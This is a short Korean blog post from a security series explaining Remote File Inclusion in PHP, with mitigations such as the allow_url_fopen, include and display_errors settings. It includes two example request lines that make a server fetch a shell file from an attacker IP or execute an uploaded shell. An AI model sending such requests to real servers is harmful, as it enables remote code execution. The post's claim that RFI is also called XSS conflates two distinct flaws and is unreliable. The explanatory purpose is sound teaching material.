알고리즘 바로가기 
보안 포스트 바로가기 
JAVA 바로가기 
리눅스 서버 바로가기 
Remote File Include는 서버 외부에 존재하는 공격자가 악성 스크립트를 서버에 전달하여
코드가 해석,실행되게 하는 공격이다.
서버가 코드를 실행한다는 점에서 방법으로써 부를 때 XSS,
해당 문제를 직접 가르킬 때 RFI라고 표현하기도 한다.
/Index.php?loading="http://192.168.131.105/shellobject.txt
/Index.php?loading="C:\www\ftproot\userfile\shellobject
위는 서버가 직접 공격자의 클라이언트(서버)로 접속하여 쉘코드를
받아오게 만들 수 있으며, 아래는 다운로드된 혹은 공격자에 의해 업로드된
쉘코드를 실행하게 만들 수 있다.
『 해결 방법 』
allow_url_fopen, include 옵션 설정,
php등에서 발견되는 문제로, 패러미터 값을 받아 직접 사용하는 경우나
URL 값을 직접 로드하는 경우 공격자의 악성파일에 접근하는 경우가 생길 수 있다.
display_errors 설정,
사용자에게 페이지를 보여줄경우, 그것이 현재 서비스 단계일 때,
노출될 수 있는 에러를 보여주지 않는 방법도 있다.
혹은 XSS 공격의 방어와 같이 문자 자체를 필터링하는 방법도 고려할 수 있다.
'보안관련 > 취약점' 카테고리의 다른 글
| 3. SQL Injection (0) | 2021.12.16 |
|---|---|
| 2. XSS (사이트 간 스크립팅) (0) | 2021.12.15 |
| 1. URL 접근 통제 실패 (0) | 2021.12.13 |
| 기술순서 (0) | 2021.12.12 |
